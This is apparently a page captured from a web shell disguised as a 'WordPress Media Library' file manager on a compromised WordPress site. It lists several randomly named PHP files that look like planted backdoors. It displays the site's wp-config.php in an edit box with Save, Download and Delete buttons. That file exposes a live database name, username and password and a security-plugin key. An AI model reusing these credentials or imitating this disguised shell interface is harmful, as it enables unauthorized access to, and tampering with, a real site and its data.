⚙ WordPress Media Library
File manager
📁 Media Files
📋 .htaccess.bk
📋 .litespeed_flag
📋 .user.ini
📋 .well-known
📦 1405.04.08.zip
🔧 BDKR28WP.php
🔧 admin.php
📋 cgi-bin
📋 error_log
🔧 fk_Dj9xuTDO.php
🔧 fk_TO2xcAOK.php
🔧 fk_f5ByKMic.php
🔧 fk_xplM3NGf.php
🌐 google0b9cb2c57cb0152b.html
🌐 google0bd56e7c851e1b47.html
🌐 google2eb318d61c301d08.html
🌐 google850dd4fcc8cf5c15.html
🔧 litespeed.php
🌐 readme.html
🔧 woocommerce.php
🔧 wp-activate.php
📋 wp-admin
🔧 wp-blog-header.php
🔧 wp-comments-post.php
🔧 wp-config-sample.php
🔧 wp-config.php
📋 wp-content
🔧 wp-cron.php
📋 wp-includes
🔧 wp-login.php
🔧 wp-mail.php
🔧 wp-settings.php
🔧 wp-signup.php
🔧 wp-trackback.php
🔧 wp_9aEsf5Kj.php
🔧 wp_r7zRd05V.php
🔧 xmlrpc.php
⬆️ Upload Media
Upload File
📝 Edit: wp-config.php
Size: 3.49 KB | Modified: 2026-07-01 15:37:03
<?php define( 'WP_CACHE', true ); // Added by WP Rocket //Begin Really Simple Security key define('RSSSL_KEY', 'njiYaC9xMylRqNa6peyXASMxBMz14REtPU578aj0RL9ylpFDl934EcDZ5v2e7tGe'); //END Really Simple Security key // Added by WP Rocket /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', "mimradmin_mimadminra" ); /** MySQL database username */ define( 'DB_USER', "mimradmin_mimadminraadminn" ); /** MySQL database password */ define( 'DB_PASSWORD', "qTpkQNDRJAjYrUFMnpmD" ); /** MySQL hostname */ define( 'DB_HOST', "localhost" ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; define( 'WP_MEMORY_LIMIT', '512M' ); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress **/ define( 'WP_DEBUG', true ); // ذخیره خطاها در فایل wp-content/debug.log define( 'WP_DEBUG_LOG', true ); // عدم نمایش خطاها روی صفحه (اختیاری ولی توصیه میشود) define( 'WP_DEBUG_DISPLAY', true ); @ini_set( 'display_errors', 0 ); // گزارش خطاهای PHP نیز فعال میشود define( 'SCRIPT_DEBUG', true ); define( 'WP_SITEURL', 'https://mimra.ir' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname(__FILE__) . '/' ); } /** Sets up WordPress vars and included files. */ require_once( ABSPATH . 'wp-settings.php' );
💾 Save Changes
📥 Download
🗑️ Delete